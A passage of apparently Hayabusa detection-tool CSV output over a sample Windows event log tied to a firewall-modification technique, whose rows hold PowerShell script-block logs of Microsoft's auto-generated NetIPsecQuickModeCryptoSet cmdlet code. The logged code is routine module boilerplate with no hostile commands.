($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [Syst",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"em.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdleti",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"em.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 